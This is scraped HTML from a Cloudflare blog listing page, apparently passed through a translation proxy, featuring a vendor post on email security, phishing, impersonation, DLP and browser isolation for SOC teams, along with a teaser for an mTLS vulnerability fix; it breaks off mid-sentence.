href="https://blog-cloudflare-com.translate.goog/resolving-a-mutual-tls-session-resumption-vulnerability/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 no-underline gray1" data-testid="post-title"><h2 class="fw5 mt2">Resolving a Mutual TLS session resumption vulnerability</h2></a> <p class="f3 fw5 gray5 my" data-testid="post-date">2025-02-07</p> <p class="f4 fw3 lh-copy " data-testid="post-content">Cloudflare patched a Mutual TLS (mTLS) vulnerability (CVE-2025-23419) reported via its Bug Bounty Program. The flaw in session resumption allowed client certificates to authenticate across different<!-- -->...</p><a href="https://blog-cloudflare-com.translate.goog/resolving-a-mutual-tls-session-resumption-vulnerability/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="no-underline gray1 f4 lh-copy fw3 underline-hover" data-testid="post-continue-reading">Continue reading »</a> <ul class="author-lists flex pl0"> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/matt-bullock/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3fEkxzMVixG4qTwCCMFlbP/50e9297df6fdc184e4cda6d4e935db69/matt-bullock.jpeg" alt="Matt Bullock" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/matt-bullock/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f4 no-underline black">Matt Bullock</a> </div></li> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/rushil-mehra/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4C0hIM94DE2YvmWRQcHfN1/943b024a7a20b37af08f873891f7f142/rushil-mehra.jpeg" alt="Rushil Mehra" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/rushil-mehra/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f4 no-underline black">Rushil Mehra</a> </div></li> <li class="list flex items-center pr2 mb3"><a href="https://blog-cloudflare-com.translate.goog/author/alessandro-ghedini/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="static-avatar pr1"><img class="author-profile-image br-100 mr2" src="https://blog.cloudflare.com/cdn-cgi/image/format=auto,dpr=3,width=64,height=64,gravity=face,fit=crop,zoom=0.5/https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6ysyaWM0uyFhi5F9X2t0jw/14d2e374a965b36818ee73b00412f671/alessandro-ghedini.jpg" alt="Alessandro Ghedini" width="62" height="62"></a> <div class="author-name-tooltip"> <a href="https://blog-cloudflare-com.translate.goog/author/alessandro-ghedini/?_x_tr_sl=pl&_x_tr_tl=de&_x_tr_hl=en-GB" class="fw5 f4 no-underline black">Alessandro Ghedini</a> </div></li> </ul> </div> <div class="w-50-l"> <img class="dn di-l " src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/j5PougMo6r0lPRYu1w1Xm/0918d4365eaa3e00dbbc2d3699c05aad/BLOG-2667_1.png" alt="Resolving a Mutual TLS session resumption vulnerability"> </div> </article><!--astro:end--> </astro-island><astro-island uid="ZyioKc" prefix="r1" component-url="/_astro/PostCard.CG32ktie.js" component-export="PostCard" renderer-url="/_astro/client.DLO1yDVm.js" props="{"currentPage":[0,1],"isFeaturedImageFirstPost":[0,false],"post":[0,{"id":[0,"4fVFiDpaCJhYAFUvAocDDC"],"title":[0,"The role of email security in reducing user risk amid rising threats"],"slug":[0,"the-role-of-email-security-in-reducing-user-risk-amid-rising-threats"],"excerpt":[0,"As threats evolve, SOC teams must adapt their operations. With Cloudflare’s holistic approach to managing user-based risk, SOC teams can operate more efficiently and reduce the likelihood of a breach."],"featured":[0,false],"html":[0,"<p>Phishing remains one of the most dangerous and persistent cyber threats for individuals and organizations. Modern attacks use a growing arsenal of deceptive techniques that bypass traditional <a href=\"https://www.cloudflare.com/en-gb/learning/email-security/secure-email-gateway-seg/\"><u>secure email gateways (SEGs)</u></a> and email authentication measures, targeting organizations, employees, and vendors. From <a href=\"https://www.cloudflare.com/learning/email-security/business-email-compromise-bec/\"><u>business email compromise (BEC)</u></a> to <a href=\"https://www.cloudflare.com/en-gb/learning/security/what-is-quishing/\"><u>QR phishing</u></a> and <a href=\"https://www.cloudflare.com/en-gb/learning/access-management/account-takeover/\"><u>account takeovers</u></a>, these threats are designed to exploit weaknesses across multiple communication channels, including email, Slack, Teams, SMS, and cloud drives.</p><p>Phishing remains the most popular attack vector for bad actors looking to gain unauthorized access or extract fraudulent payment, and it is <a href=\"https://blog.cloudflare.com/2023-phishing-report/\"><u>estimated</u></a> that 90% of all attacks <a href=\"https://www.cisa.gov/shields-guidance-families\"><u>start</u></a> with a <a href=\"https://www.cloudflare.com/learning/access-management/phishing-attack/\"><u>phishing</u></a> email. However, as companies have shifted to using a multitude of apps to support communication and collaboration, attackers too have evolved their approach. Attackers now engage employees across a combination of channels in an attempt to build trust and pivot targeted users to less-secure apps and devices. Cloudflare is uniquely positioned to address this trend thanks to our integrated <a href=\"https://www.cloudflare.com/zero-trust/\"><u>Zero Trust</u></a> services, extensive visibility from protecting <a href=\"https://w3techs.com/technologies/overview/proxy/all\"><u>approximately 20% of all websites</u></a>, and signals derived from processing billions of email messages a year.</p><p>Cloudflare recognizes that combating phishing requires an integrated approach and a more complete view of user-based risk. That’s why we’ve designed our email security solution to protect organizations before, during, and after message delivery, while also extending protection beyond email into the broader security ecosystem. Phishing is no longer just an email problem — it’s a multi-channel, cross-application threat.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"assessing-holistic-user-risk\">Assessing holistic user risk</h2>\n <a href=\"#assessing-holistic-user-risk\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>When it comes to protecting against user-based threats, Cloudflare employs a platform approach to security. Instead of forcing customers to rely on an array of fragmented tools that create unnecessary complexity and blind spots, we treat email security as part of an overall strategy for assessing and responding to user-related risk. Our email security solution works in tandem with our network solutions so that SOC teams can quickly assert what actions their users are performing outside of email. Given our extensive network visibility, our platform is not limited by API integrations, and can provide SOC teams with the best visibility and protection. This helps SOC teams not only combat phishing, but begin to identify and take action against a wider range of insider threats.</p><p>Within a single, unified dashboard, SOC teams can quickly review detailed information regarding the following questions, which we discuss in more detail below: </p><ol><li><p>Who in the organization is being targeted?</p></li><li><p>Who are the attackers impersonating?</p></li><li><p>What risky behaviors are my users performing?</p></li></ol>\n <div class=\"flex anchor relative\">\n <h3 id=\"who-in-the-organization-is-being-targeted\">Who in the organization is being targeted?</h3>\n <a href=\"#who-in-the-organization-is-being-targeted\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7hCZ0UXnPA7Wx5iBHxkfjE/47a143332f6c22c7e11b568b43dfdd74/BLOG-2645_2.png\" alt=\"BLOG-2645 2\" class=\"kg-image\" width=\"949\" height=\"241\" loading=\"lazy\"/>\n </figure><p>Within the Cloudflare dashboard, SOC teams can view which users are the most targeted. This can help them determine which accounts should be hardened (e.g. MFA enforced), and identify risky users that should be monitored more closely for significant deviations in behavior. One way organizations can use this information is to require high-risk users to connect from a managed device. For instance, if they use Crowdstrike, <a href=\"https://developers.cloudflare.com/cloudflare-one/identity/devices/service-providers/crowdstrike/\"><u>we can require that these users be on a managed device</u></a> and force a posture check before letting them access sensitive applications. </p><p>SOC teams can also dive into what types of attacks are hitting their users and at what frequency.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2nVgW0EXy3qzC2hDBeJRAx/5cf8408ec72339fe8985019629912cbb/BLOG-2645_3.png\" alt=\"BLOG-2645 3\" class=\"kg-image\" width=\"765\" height=\"319\" loading=\"lazy\"/>\n </figure><p>Customers can use these insights to adjust various platform policies, effectively blocking malicious content and securing sensitive resources. Above, we can see that attackers are frequently leveraging links to try to compromise users. Based on the link analysis we are seeing in email, SOC teams can use our gateway to block similar attacks, so that when attackers try to use other communication methods (LinkedIn, Teams, Slack, etc.) users will not be able to interact with those links.</p><p>To learn more about stopping these types of multichannel phishing attacks, please see our blog post, <a href=\"https://blog.cloudflare.com/a-wild-week-in-phishing-and-what-it-means-for-you/\"><i><u>A wild week in phishing, and what it means for you</u></i></a><i>.</i></p>\n <div class=\"flex anchor relative\">\n <h3 id=\"who-are-the-attackers-impersonating\">Who are the attackers impersonating?</h3>\n <a href=\"#who-are-the-attackers-impersonating\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n \n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/16lvS6lNsi4TuSgtMFqBtk/b093ecb444def1bd06fb84566b5eb05a/BLOG-2645_4.png\" alt=\"BLOG-2645 4\" class=\"kg-image\" width=\"799\" height=\"370\" loading=\"lazy\"/>\n </figure><p>SOC teams can also get visibility into impersonation attempts within their email environment. Customers can see which users are being impersonated the most, and can use this information to build policies within our email security solution and broader set of Zero Trust services.</p><p>A list of frequently impersonated users can be added to the <a href=\"https://developers.cloudflare.com/cloudflare-one/email-security/detection-settings/impersonation-registry/\"><u>impersonation registry</u></a>, which changes the sensitivity of our models to apply more scrutiny on messages coming from those users. </p><p>Given our unique position as a <a href=\"https://www.cloudflare.com/en-gb/products/registrar/\"><u>domain name registrar</u></a>, customers can also report lookalike domains to Cloudflare for action to be taken against them. This helps prevent attackers from being able to impersonate our customers and negatively impact their reputation. </p><p>Finally, customers can also use our free <a href=\"https://developers.cloudflare.com/dmarc-management/\"><u>DMARC management</u></a> to track who is sending emails on their behalf. This information can be used to update <a href=\"https://www.cloudflare.com/en-gb/learning/dns/dns-records/dns-spf-record/\"><u>SPF records</u></a> and get customers to <code>p=quarantine</code> or <code>p=reject</code> so that their brand is more resistant to being spoofed. </p>\n <div class=\"flex anchor relative\">\n <h3 id=\"what-risky-behaviors-are-my-users-performing\">What risky behaviors are my users performing?</h3>\n <a href=\"#what-risky-behaviors-are-my-users-performing\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare provides visibility into user actions in several ways. </p><p>Within the email security solution, we can track internal messages and alert if we see any malicious or suspicious behaviors. This can be enhanced with our managed service offering, <a href=\"https://developers.cloudflare.com/cloudflare-one/email-security/phish-guard/\"><u>Phishguard</u></a>, which can alert admins when they see any type of behavior that indicates fraud (like Business Email Compromise), account takeover, or insider threats.</p><p>SOC teams can also take advantage of our <a href=\"https://www.cloudflare.com/en-gb/zero-trust/products/casb/\"><u>CASB solution</u></a> to view the different actions that users have performed. Actions are labeled with different risk levels to let teams know which findings are critical and require remediation. </p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7aiDl5Qo2PGsGYF7NfYcDT/dc49eb88beffc7b9df099d71244489c9/BLOG-2645_5.png\" alt=\"BLOG-2645 5\" class=\"kg-image\" width=\"1620\" height=\"638\" loading=\"lazy\"/>\n </figure><p>Customers are also able to view data loss prevention (<a href=\"https://www.cloudflare.com/en-gb/zero-trust/products/dlp/\"><u>DLP</u></a>) violations that users have incurred to see if there is any unauthorized egress of data. We provide the ability to automatically block this egress based on different policies within our platform, making sure there is no exfiltration of sensitive data.</p><p>We also enable organizations to put internal applications behind our <a href=\"https://www.cloudflare.com/en-gb/zero-trust/products/access/\"><u>Access</u></a> solution. This prevents any users with improper permissions or a high risk level from accessing critical applications. Our dashboard then provides metrics on these logins to see how many failures we observed, so that SOC teams can investigate the user further. </p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/34LnlEK1lkpbeW5mYLSl8m/5d51092b134bfd7e2d6093a04fcfdc60/BLOG-2645_6.png\" alt=\"BLOG-2645 6\" class=\"kg-image\" width=\"867\" height=\"467\" loading=\"lazy\"/>\n </figure><p>These signals feed into our <a href=\"https://blog.cloudflare.com/unified-risk-posture/\"><u>Unified Risk Score</u></a>, which can be exported if needed to take automated actions within other platforms.</p>\n <div class=\"flex anchor relative\">\n <h2 id=\"increasing-soc-productivity\">Increasing SOC productivity</h2>\n <a href=\"#increasing-soc-productivity\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>With all of our functionality unified within a single interface and fed by one data lake, we see an increase in SOC productivity because teams no longer have to spend time building rules or flipping between disparate interfaces and workflows. </p>\n <div class=\"flex anchor relative\">\n <h3 id=\"ai-driven-email-security\">AI-driven email security</h3>\n <a href=\"#ai-driven-email-security\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Unlike legacy secure email gateways, our email security solution is driven by predictive AI models which eliminate the need for creating and updating rules. These models are also more effective than reactive measures because they are fed by a massive volume of diverse data from across Cloudflare’s network. This means models are trained on emerging threats earlier and can identify new tactics with a higher accuracy than legacy systems. </p>\n <div class=\"flex anchor relative\">\n <h3 id=\"automated-isolation\">Automated isolation</h3>\n <a href=\"#automated-isolation\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>To further reduce the risk posed by users visiting potentially malicious websites, customers can isolate browser sessions using our natively integrated, clientless remote browser that runs on our <a href=\"https://www.cloudflare.com/network\"><u>global network</u></a>. Within an isolated browsing session, SOC teams can prohibit various behaviors such as copy/paste, upload/download, keyboard inputs, and more. This decreases the risk of users accessing a website and performing an action which could compromise the organization.</p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/65YXZvV78mjzNXvV4YLJRD/b0ef76d80edd7769a23d877ffdc25696/BLOG-2645_7.png\" alt=\"BLOG-2645 7\" class=\"kg-image\" width=\"1535\" height=\"486\" loading=\"lazy\"/>\n </figure><p>Our browser isolation solution also decreases the time SOC teams need to maintain policies. Rather than adding domains and applications one by one, teams can choose to isolate based on content categories. These categories are based on our threat intelligence, and are constantly updated. This means that as new websites emerge, SOC teams do not have to spend the time to chase down and update the proper policy — rather, it is done automatically. </p>\n <figure class=\"kg-card kg-image-card\">\n <Image src=\"https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2aCMZRmIRp33YbGTU5Vxt6/44ca92e4e3cde07b1424b9875311dd59/BLOG-2645_8.png\" alt=\"BLOG-2645 8\" class=\"kg-image\" width=\"1584\" height=\"449\" loading=\"lazy\"/>\n </figure>\n <div class=\"flex anchor relative\">\n <h3 id=\"automated-blocking\">Automated blocking</h3>\n <a href=\"#automated-blocking\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>While some websites might require running in an isolated browser to mitigate the risk of users encountering malicious content, others may need to be fully blocked altogether. Customers can use the same process listed above to block any website that could be risky for users based on tags. However, we allow admins to also provide feedback to users to increase awareness. This can be done via a <a href=\"https://developers.cloudflare.com/cloudflare-one/policies/gateway/block-page/\"><u>custom block page</u></a> that allows SOC teams to communicate with users about their risky behaviors, so that they take actions to curb this behavior in the future and alert their SOC teams to attacks that might be occurring. </p>\n <div class=\"flex anchor relative\">\n <h2 id=\"whats-on-the-horizon-for-2025\">What's on the horizon for 2025</h2>\n <a href=\"#whats-on-the-horizon-for-2025\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>In 2024, our email security team focused on refining the user interface and improving the incident investigation experience. Looking ahead to 2025, we plan to introduce additional capabilities that deepen the integration of our email security solution with our SASE platform, delivering enhanced insight and protection against user-based threats. </p>\n <div class=\"flex anchor relative\">\n <h3 id=\"configurable-browser-isolation-for-email\">Configurable browser isolation for email</h3>\n <a href=\"#configurable-browser-isolation-for-email\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Our Email Link Isolation feature currently applies to links we consider suspicious. However, we intend to allow customers to add customized configurations to meet their internal policies. This enhancement will provide more granular control over which websites users can access from an email message without using an isolated browser. </p>\n <div class=\"flex anchor relative\">\n <h3 id=\"outbound-dlp-for-email\">Outbound DLP for email</h3>\n <a href=\"#outbound-dlp-for-email\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We will be releasing an add-in for Microsoft Outlook that will allow customers to use our DLP engine for inspecting outbound email messages. This client-side application enables customers to configure downstream policies that trigger action when a DLP policy is violated, all while minimizing disruption to existing email infrastructure. </p>\n <div class=\"flex anchor relative\">\n <h3 id=\"expanded-user-risk-scoring\">Expanded user risk scoring</h3>\n <a href=\"#expanded-user-risk-scoring\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>Cloudflare will be increasing the signals that feed into our user risk scores. This will enable SOC teams to create more policies within Cloudflare or to take automated actions externally based on the level of risk observed. </p><p>These are just a few examples of significant releases that will be coming in 2025. Please stay tuned to the Cloudflare blog where we will be announcing these releases as they happen. </p>\n <div class=\"flex anchor relative\">\n <h2 id=\"try-cloudflare-email-security-today\">Try Cloudflare Email Security today</h2>\n <a href=\"#try-cloudflare-email-security-today\" aria-hidden=\"true\" class=\"relative sm:absolute sm:-left-5\">\n <svg width=\"16\" height=\"16\" viewBox=\"0 0 24 24\"><path fill=\"currentcolor\" d=\"m12.11 15.39-3.88 3.88a2.52 2.52 0 0 1-3.5 0 2.47 2.47 0 0 1 0-3.5l3.88-3.88a1 1 0 0 0-1.42-1.42l-3.88 3.89a4.48 4.48 0 0 0 6.33 6.33l3.89-3.88a1 1 0 1 0-1.42-1.42Zm8.58-12.08a4.49 4.49 0 0 0-6.33 0l-3.89 3.88a1 1 0 0 0 1.42 1.42l3.88-3.88a2.52 2.52 0 0 1 3.5 0 2.47 2.47 0 0 1 0 3.5l-3.88 3.88a1 1 0 1 0 1.42 1.42l3.88-3.89a4.49 4.49 0 0 0 0-6.33ZM8.83 15.17a1 1 0 0 0 1.1.22 1 1 0 0 0 .32-.22l4.92-4.92a1 1 0 0 0-1.42-1.42l-4.92 4.92a1 1 0 0 0 0 1.42Z\"></path></svg>\n </a>\n </div>\n <p>We provide all organizations (whether a Cloudflare customer or not) with free access to our <a href=\"https://blog.cloudflare.com/threats-lurking-office-365-cloudflare-email-retro-scan/\"><u>Retro Scan</u></a> tool, allowing them 